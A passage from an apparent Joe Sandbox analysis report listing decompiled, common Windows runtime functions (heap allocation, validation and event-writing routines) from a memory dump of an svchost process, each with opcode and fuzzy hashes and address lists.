                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a4bcd0d92b670aababc4a6a13330367feb3772484dcd0bdaa71d2ea318d31837
                        • Instruction ID: df1a474eee645ad8b560cf1c98e710f939b492ac577fb35e54b054ed9f993109
                        • Opcode Fuzzy Hash: a4bcd0d92b670aababc4a6a13330367feb3772484dcd0bdaa71d2ea318d31837
                        • Instruction Fuzzy Hash: 040131B5A01208AFCB04EFA9D545AAEB7F4FF48700F104059B815EB341E6349A00CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F8F6A Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        C-Code - Quality: 48%
                        			E030F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x311d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03047D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0306B640(E03069AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                        0x030f8f6a
                        0x030f8f79
                        0x030f8f81
                        0x030f8f84
                        0x030f8f8b
                        0x030f8f91
                        0x030f8f94
                        0x030f8f9e
                        0x030f8fb0
                        0x030f8fa0
                        0x030f8fa9
                        0x030f8fa9
                        0x030f8fbb
                        0x030f8fbc
                        0x030f8fbe
                        0x030f8fc3
                        0x030f8fd6

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46ff5b00efaf159d05891f136219373e657df74ca892b2f2176c421a2b28933c
                        • Instruction ID: 097031987ee38147f57df36d34dad81a5eb80d3e7f7c32464443668a239bf2ba
                        • Opcode Fuzzy Hash: 46ff5b00efaf159d05891f136219373e657df74ca892b2f2176c421a2b28933c
                        • Instruction Fuzzy Hash: 0B014474A0120DAFCB04EFA8D545AEEB7F4EF48300F108459B905EB381DB34DA00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030E1608 Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E030E1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x311d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03047D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0306B640(E03069AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                        0x030e1608
                        0x030e1617
                        0x030e161d
                        0x030e1625
                        0x030e1628
                        0x030e162b
                        0x030e1636
                        0x030e1648
                        0x030e1638
                        0x030e1641
                        0x030e1641
                        0x030e1653
                        0x030e1654
                        0x030e1656
                        0x030e165b
                        0x030e166e

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b9fa72dd2c63576b704d855fa17970a696d69635234ca1a0c8c0537253b568e
                        • Instruction ID: c27598c83fa49f96cccbd391757adc051e42b2f46f8d592793216c3ece3b74c9
                        • Opcode Fuzzy Hash: 4b9fa72dd2c63576b704d855fa17970a696d69635234ca1a0c8c0537253b568e
                        • Instruction Fuzzy Hash: EDF062B5A11358EFCB04EFA9D505AAEB7F4FF58300F044069B915EB381EA349A00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304C577 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0304C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0304C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x30011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E030F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                        0x0304c577
                        0x0304c57d
                        0x0304c581
                        0x0304c5b5
                        0x0304c5b9
                        0x0304c5ce
                        0x0304c5ce
                        0x0304c5ca
                        0x00000000
                        0x0304c5ca
                        0x0304c5c4
                        0x0304c5c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0304c5ad
                        0x00000000
                        0x0304c5af

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b533de17641f9adcf6d77d6b97643e9af75fa19e2c6df7cf817456404dd007d1
                        • Instruction ID: 1dec091ba688150c7f6c4b7bab4b03d9831fd9afdd02e24268a9febe70d03fa5
                        • Opcode Fuzzy Hash: b533de17641f9adcf6d77d6b97643e9af75fa19e2c6df7cf817456404dd007d1
                        • Instruction Fuzzy Hash: D0F0B4F2917790BFF775C718C004B69BBD89B45670F4C88B7D40687541D6A4EEC0C250
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0306927A Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E0306927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0306FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E030692C6(_t11, _t14);
				}
				return _t11;
			}





                        0x03069295
                        0x03069299
                        0x0306929f
                        0x030692aa
                        0x030692ad
                        0x030692ae
                        0x030692af
                        0x030692b0
                        0x030692b4
                        0x030692bb
                        0x030692bb
                        0x030692c5

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction ID: 52788573233110d39911c22be9ce6499809d83d807b8962b0211b46a8175c277
                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction Fuzzy Hash: 1AE02B723416016BD751DE06DCC0F57779DEFC2720F044078B5005E242C6F5DD0887A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030E2073 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E030E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E030DFD22(__ecx);
				_t19 =  *0x311849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3118748; // 0x0
					if(__eflags <= 0) {
						E030E1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3118724 & 0x00000004;
							if(( *0x3118724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3118724; // 0x1
					return E030D8DF1(__ebx, 0xc0000374, 0x3115890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                        0x030e2076
                        0x030e2078
                        0x030e207d
                        0x030e2083
                        0x030e20a4
                        0x030e20aa
                        0x030e20ac
                        0x030e20b7
                        0x030e20ba
                        0x030e20bc
                        0x030e20c9
                        0x030e20c9
                        0x030e20d0
                        0x030e20d2
                        0x00000000
                        0x030e20d2
                        0x030e20be
                        0x030e20c3
                        0x030e20c5
                        0x030e20c7
                        0x00000000
                        0x00000000
                        0x030e20c7
                        0x030e20bc
                        0x030e20d4
                        0x030e2085
                        0x030e2085
                        0x030e20a3
                        0x030e20a3

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d7905baa559a3d5c1ef968b93e6bba5c20ff56ff8ed813d56c06886adeaacab
                        • Instruction ID: c5abcde9afaf4d133ec199e896b985f2031359ac26f67a7f61e246734ace45be
                        • Opcode Fuzzy Hash: 6d7905baa559a3d5c1ef968b93e6bba5c20ff56ff8ed813d56c06886adeaacab
                        • Instruction Fuzzy Hash: 2BF0A77B6172944FDE7AFB6462013D17BEDD78D111B0D4885D4505B24AC93488C3DA24
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F8D34 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 43%
                        			E030F8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x311d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03047D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0306B640(E03069AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                        0x030f8d34
                        0x030f8d43
                        0x030f8d4b
                        0x030f8d4e
                        0x030f8d52
                        0x030f8d5c
                        0x030f8d6e
                        0x030f8d5e
                        0x030f8d67
                        0x030f8d67
                        0x030f8d79
                        0x030f8d7a
                        0x030f8d7c
                        0x030f8d81
                        0x030f8d94

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5579c3f501ea275023368301846f8d71c8804743fa0b1e9a8f5fde47219593a1
                        • Instruction ID: f06ff7cab424adb5ada516e0db8c8d4c565a8ebdef84f29cfe7607cae19db9a7
                        • Opcode Fuzzy Hash: 5579c3f501ea275023368301846f8d71c8804743fa0b1e9a8f5fde47219593a1
                        • Instruction Fuzzy Hash: E0F0B474A05708AFCB04EFB8D541AAEB7F4EF58700F108499E905EB280EA34D900C754
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F8B58 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 36%
                        			E030F8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x311d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03047D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0306B640(E03069AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                        0x030f8b67
                        0x030f8b6f
                        0x030f8b72
                        0x030f8b7d
                        0x030f8b8f
                        0x030f8b7f
                        0x030f8b88
                        0x030f8b88
                        0x030f8b9a
                        0x030f8b9b
                        0x030f8b9d
                        0x030f8ba2
                        0x030f8bb5

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 428ff4592517ddab28c75f1698b659d72ccc5624789e07228a549878254fb386
                        • Instruction ID: 8d792f47d766d2831eaacb7174d9726d6195d0166540d5505c8b29177dbfb24a
                        • Opcode Fuzzy Hash: 428ff4592517ddab28c75f1698b659d72ccc5624789e07228a549878254fb386
                        • Instruction Fuzzy Hash: 52F082B4A15258AFDB04EBA8D906EBEB3F8EF44700F044459BA15DF380EB34D900C794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03024F2E Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E03024F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E030F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0304C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3001030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                        0x03024f2e
                        0x03024f34
                        0x03024f38
                        0x03080b85
                        0x03080b85
                        0x03080b89
                        0x03080b9a
                        0x03080b9a
                        0x03080b9f
                        0x00000000
                        0x03080b9f
                        0x03080b94
                        0x03080b98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03080b98
                        0x03024f3e
                        0x03024f48
                        0x00000000
                        0x03024f6e
                        0x00000000
                        0x03024f70

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b56838cc78b7fa28067f9dbdaf46f39b4ba962884b05a5e2d8fbbb9e0c125c82
                        • Instruction ID: 9d86aef5b70346a3bd3be1c6b290982e1743433918ffd8b85e6b0285231d1b95
                        • Opcode Fuzzy Hash: b56838cc78b7fa28067f9dbdaf46f39b4ba962884b05a5e2d8fbbb9e0c125c82
                        • Instruction Fuzzy Hash: A7F0E236523794AFE7B1E71CC140B62BBDCAB007BCF0884B4D4858B920C724EC88C640
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304746D Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E0304746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0303EB70(__ecx, 0x31179a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E030695D0();
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                        0x0304746d
                        0x0304746d
                        0x0304746d
                        0x03047471
                        0x03047488
                        0x0308f92d
                        0x0304748e
                        0x03047491
                        0x03047495
                        0x0308f937
                        0x0308f93a
                        0x0308f94e
                        0x0308f953
                        0x0308f956
                        0x0308f956
                        0x03047495
                        0x00000000
                        0x03047488
                        0x03047473
                        0x03047478
                        0x0304747d
                        0x03047481
                        0x00000000
                        0x03047481
                        0x0304747d
                        0x0304747a
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cc84538fdcf854eab961db7c6981f8265672ee6865d3721b7c27211b61e9ab8
                        • Instruction ID: 8840b3e028353a15862a664d8c2022f4fcabc28d9a2b0e71f603ee0553cb9e30
                        • Opcode Fuzzy Hash: 1cc84538fdcf854eab961db7c6981f8265672ee6865d3721b7c27211b61e9ab8
                        • Instruction Fuzzy Hash: FAF0E978903245AACF55E778E440BBEBBB5AF84B10F080A75D4F1AB990E724DA01C785
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F8CD6 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 36%
                        			E030F8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x311d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03047D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0306B640(E03069AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                        0x030f8ce5
                        0x030f8ced
                        0x030f8cf0
                        0x030f8cfb
                        0x030f8d0d
                        0x030f8cfd
                        0x030f8d06
                        0x030f8d06
                        0x030f8d18
                        0x030f8d19
                        0x030f8d1b
                        0x030f8d20
                        0x030f8d33

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 661c697a5424e7bc50d9004aa89039fe1bac1b29df36af790693d3ee770a4c6c
                        • Instruction ID: 598497b9a20e5c72e2715c18c7034cc56b6415471d08b51091fda01002d32b77
                        • Opcode Fuzzy Hash: 661c697a5424e7bc50d9004aa89039fe1bac1b29df36af790693d3ee770a4c6c
                        • Instruction Fuzzy Hash: 30F082B5A06608AFDB04EBA9E945EEEB7F4EF58200F144599F915EB280EA34D900C754
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305A44B Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0305A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3117b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0306FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                        0x0305a44b
                        0x0305a453
                        0x0305a472
                        0x0305a476
                        0x00000000
                        0x0305a493
                        0x0305a47a
                        0x0305a47f
                        0x0305a486
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ada3712f4db2193d9cda4918e1f44c8dd344dba6be1413d8499c9b3c7359f907
                        • Instruction ID: 9553029ed8e32bf1b76d280f7b5e5ca1a7d74260e2ae7eba38849c27727ece18
                        • Opcode Fuzzy Hash: ada3712f4db2193d9cda4918e1f44c8dd344dba6be1413d8499c9b3c7359f907
                        • Instruction Fuzzy Hash: A5E092B2B02421ABD2129A58BC00FA7B39DEBD4A51F094535F904CB254D668DD01C7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302F358 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E0302F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0305F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03044620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                        0x0302f35d
                        0x0302f361
                        0x0302f367
                        0x0302f372
                        0x0302f38c
                        0x0302f38c
                        0x0302f394

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction ID: 031aaef6eac5c33a8a888377c3a4fceac21b2fc3239544b0598bf76320f5787f
                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction Fuzzy Hash: 2EE0D832A42228FBDB21E6D99D05F9BBFFCDB84AE0F040195B904DB150D5659E00C3D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0303FF60 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0303FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x30011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E030F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03040050(_t14);
				}
			}










                        0x0303ff66
                        0x0303ff6b
                        0x00000000
                        0x0303ff8f
                        0x00000000
                        0x0303ff8f

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e42563eeee148da687d1031a7e9e30721368611fc32207f39eecf2814b4658f5
                        • Instruction ID: f66991992ed6f5abaed15d63b5dbb0a61efad462a50e7432ae786285e2a5c825
                        • Opcode Fuzzy Hash: e42563eeee148da687d1031a7e9e30721368611fc32207f39eecf2814b4658f5
                        • Instruction Fuzzy Hash: B8E0DFB4A073059FD738DB55D040F6A77DC9F83721F1D849DE8084B501C7A1D881C606
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030DD380 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E030DD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0302E8B0(__ecx, _a4, 0xfff);
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                        0x030dd38a
                        0x030dd39b
                        0x030dd3b1
                        0x00000000
                        0x030dd3b6
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
